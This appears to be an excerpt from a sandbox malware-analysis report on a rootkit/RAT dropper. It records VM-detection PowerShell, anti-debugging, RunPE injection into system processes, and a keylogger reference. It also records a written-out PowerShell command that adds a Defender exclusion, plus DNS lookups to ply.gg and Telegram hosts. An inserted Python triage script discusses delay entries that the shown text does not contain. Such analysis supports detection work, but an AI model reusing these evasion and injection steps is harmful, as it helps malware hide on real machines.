                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
                          Source: dwm.exe, 00000010.00000002.3015392657.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                          Source: Microsoft-Windows-PowerShell%4Operational.evtx.25.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
                          Source: svchost.exe, 0000002E.00000002.2936876643.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_6-7289
                          Source: C:\Users\Public\DeadROOTkit.exeProcess information queried: ProcessInformationJump to behavior
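The "Thread delayed" entries above carry two distinct stalling patterns, and the following Python classifier (an added example, not part of the Joe Sandbox report and not the sample's code) separates them from report lines in the "Source: ... | Thread delayed: delay time: ..." form used on this page. The value 922337203685477 equals TimeSpan.MaxValue in milliseconds (9223372036854775807 ticks / 10000), i.e. an unbounded wait rather than a timed sleep, while the DeadROOTkit.exe series from 600000 down to 598440 is a loop re-sleeping for whatever remains of a ten-minute budget. The sample lines are constructed from the values in the report; the "|" separator in the entry format is an assumption.

```python
"""Classify the 'Thread delayed' entries of a sandbox behaviour report.

Added example for this page; it is not part of the Joe Sandbox report and
not the malware's code.  Assumption: entries have the form
'Source: <process> | Thread delayed: delay time: <milliseconds>'.
The sample lines below are constructed from the values shown in the report.
"""
import re
from collections import defaultdict

# TimeSpan.MaxValue (9223372036854775807 ticks of 100 ns) in whole milliseconds.
# A delay of this size is an unbounded wait, not a timed sleep.
DOTNET_INFINITE_MS = 9223372036854775807 // 10_000   # 922337203685477

# Stalls at or above this budget are long enough to outlast many sandbox runs.
LONG_STALL_MS = 5 * 60 * 1000

ENTRY_RE = re.compile(
    r"Source:\s*(?P<proc>\S+)\s*\|\s*Thread delayed: delay time:\s*(?P<ms>\d+)"
)

# Constructed from the report's values (a subset of the DeadROOTkit.exe series).
SAMPLE_ENTRIES = """\
Source: C:\\Users\\user\\Desktop\\mIURiU8n2P.exe | Thread delayed: delay time: 922337203685477
Source: C:\\Users\\Public\\DeadROOTkit.exe | Thread delayed: delay time: 922337203685477
Source: C:\\Users\\Public\\DeadROOTkit.exe | Thread delayed: delay time: 600000
Source: C:\\Users\\Public\\DeadROOTkit.exe | Thread delayed: delay time: 599875
Source: C:\\Users\\Public\\DeadROOTkit.exe | Thread delayed: delay time: 599765
Source: C:\\Users\\Public\\DeadROOTkit.exe | Thread delayed: delay time: 598440
Source: C:\\Windows\\System32\\dllhost.exe | Thread delayed: delay time: 922337203685477
"""


def parse_delays(text):
    """Return {process: [delay_ms, ...]} in report order, skipping unrelated lines."""
    delays = defaultdict(list)
    for line in text.splitlines():
        m = ENTRY_RE.search(line)
        if m:
            delays[m.group("proc")].append(int(m.group("ms")))
    return dict(delays)


def classify(delay_list):
    """Summarise one process's delays.

    infinite     - number of TimeSpan.MaxValue waits (block until signalled)
    stall_budget - the largest finite delay seen, in ms
    countdown    - True when consecutive finite delays shrink step by step, the
                   signature of a loop re-sleeping for 'deadline minus elapsed'
    long_stall   - True when the finite budget reaches LONG_STALL_MS
    """
    finite = [d for d in delay_list if d < DOTNET_INFINITE_MS]
    infinite = len(delay_list) - len(finite)
    countdown = len(finite) >= 3 and all(a > b for a, b in zip(finite, finite[1:]))
    return {
        "infinite": infinite,
        "stall_budget": max(finite) if finite else 0,
        "countdown": countdown,
        "long_stall": bool(finite) and max(finite) >= LONG_STALL_MS,
    }


def report(text):
    """Classification per process for every 'Thread delayed' line in `text`."""
    return {proc: classify(ds) for proc, ds in parse_delays(text).items()}


if __name__ == "__main__":
    for proc, summary in report(SAMPLE_ENTRIES).items():
        print(proc, summary)
```

A countdown with a large budget is the entry worth triaging: an infinite wait on its own is also what an idle server thread or a keyboard hook's message loop looks like, which is why several benign-looking processes in the report (powershell.exe, dllhost.exe) show the same 922337203685477 value.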

                          Anti Debugging

                          Source: C:\Users\Public\DeadROOTkit.exe | Code function: 2_2_00007FFD9B8078C1 CheckRemoteDebuggerPresent,2_2_00007FFD9B8078C1
                          Source: C:\Users\Public\DeadROOTkit.exe | Process queried: DebugPort
                          Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_000002E86A0981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000002E86A0981B0
                          Source: C:\Users\Public\DeadCodeRootKit.exe | Code function: 3_2_00B019E2 StrCatW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrCatW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,RtlFreeHeap,3_2_00B019E2
                          Source: C:\Users\Public\DeadXClient.exe | Process token adjusted: Debug
                          Source: C:\Users\Public\DeadROOTkit.exe | Process token adjusted: Debug
                          Source: C:\Users\Public\DeadROOTkit.exe | Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                          Source: C:\Windows\System32\dllhost.exe | Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                          Source: C:\Users\Public\Deadsvchost.exe | Process token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                          Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_000002E86A098518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000002E86A098518
                          Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_000002E86A0981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000002E86A0981B0
                          Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_000002E86A09B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000002E86A09B62C
                          Source: C:\Windows\System32\winlogon.exe | Code function: 11_2_00000225DC6481B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000225DC6481B0
                          Source: C:\Windows\System32\winlogon.exe | Code function: 11_2_00000225DC64B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000225DC64B62C
                          Source: C:\Windows\System32\winlogon.exe | Code function: 11_2_00000225DC648518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00000225DC648518
                          Source: C:\Windows\System32\lsass.exe | Code function: 12_2_00000202C0AEB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000202C0AEB62C
                          Source: C:\Windows\System32\lsass.exe | Code function: 12_2_00000202C0AE81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00000202C0AE81B0
                          Source: C:\Windows\System32\lsass.exe | Code function: 12_2_00000202C0AE8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00000202C0AE8518
                          Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000002A66130B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002A66130B62C
                          Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000002A661308518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_000002A661308518
                          Source: C:\Windows\System32\svchost.exe | Code function: 14_2_000002A6613081B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002A6613081B0
                          Source: C:\Windows\System32\dwm.exe | Code function: 16_2_000002BAAF2181B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000002BAAF2181B0
                          Source: C:\Windows\System32\dwm.exe | Code function: 16_2_000002BAAF21B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000002BAAF21B62C
                          Source: C:\Windows\System32\dwm.exe | Code function: 16_2_000002BAAF218518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_000002BAAF218518
                          Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000026A879C8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0000026A879C8518
                          Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000026A879CB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000026A879CB62C
                          Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000026A879C81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000026A879C81B0
                          Source: C:\Windows\System32\svchost.exe | Code function: 19_2_00000179537A81B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000179537A81B0
                          Source: C:\Windows\System32\svchost.exe | Code function: 19_2_00000179537AB62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00000179537AB62C
                          Source: C:\Windows\System32\svchost.exe | Code function: 19_2_00000179537A8518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00000179537A8518
                          Source: C:\Windows\System32\svchost.exe | Code function: 20_2_000002295D56B62C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002295D56B62C
                          Source: C:\Windows\System32\svchost.exe | Code function: 20_2_000002295D568518 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000002295D568518
                          Source: C:\Windows\System32\svchost.exe | Code function: 20_2_000002295D5681B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000002295D5681B0
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exe | Memory allocated: page read and write | page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Windows\System32\svchost.exe | Domain query: updates-full.gl.at.ply.gg
                          Source: C:\Windows\System32\svchost.exe | Domain query: subscribe-bond.gl.at.ply.gg
                          Source: C:\Windows\System32\svchost.exe | Domain query: api.telegram.org
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs | .Net Code: Run contains injection code
                          Source: 3.0.DeadCodeRootKit.exe.b040b0.1.raw.unpack, RunPE.cs | .Net Code: Run contains injection code
                          Source: 3.2.DeadCodeRootKit.exe.b040b0.1.raw.unpack, RunPE.cs | .Net Code: Run contains injection code
                          Source: 4.2.powershell.exe.11113b8b798.11.raw.unpack, RunPE.cs | .Net Code: Run contains injection code
                          Source: DeadXClient.exe.0.dr, Messages.cs | Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                          Source: DeadROOTkit.exe.0.dr, XLogger.cs | Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, Unhook.cs | Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs | Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs | Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs | Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
                          Source: 0.2.mIURiU8n2P.exe.12861a30.4.raw.unpack, RunPE.cs | Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
                          Source: C:\Users\Public\DeadROOTkit.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
                          Source: C:\Users\Public\DeadROOTkit.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
                          Source: C:\Users\Public\DeadROOTkit.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
                          Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140002430 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,6_2_0000000140002430
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: DC612AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 612D2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\dwm.exe EIP: AF1E2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 87992AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 53772AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5D532AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 67D2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5B392AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 59042AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A9E72AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 73162AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4E862AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 473C2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: D3F72AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A4152AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: BDF32AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C0262AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C9F32AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 645B2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 7B2A2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4F62AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 2AB42AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25DA2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F5352AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F0D62AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FFB2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C2572AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8B942AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 66932AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 13EF2AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8D572AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 69B42AB8
                          Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CC742AB8
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BA2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78742AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 641A2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DB2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C5AA2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F8FD2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F33D2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 48772AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FB21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EAD62AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 86DD2AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DB12AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F952AB8Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10C21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10C21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DC21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EC21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F321CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13E21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F321CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E221CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F221CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15B21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B621CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F421CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F221CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13121CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AA21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F221CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F421CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C221CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A421CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13821CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14C21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B421CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5121CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E321CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EA21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10B21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B921CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F121CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13921CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B021CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14721CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5C21CFJump to behavior
                          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC21CFJump to behavior
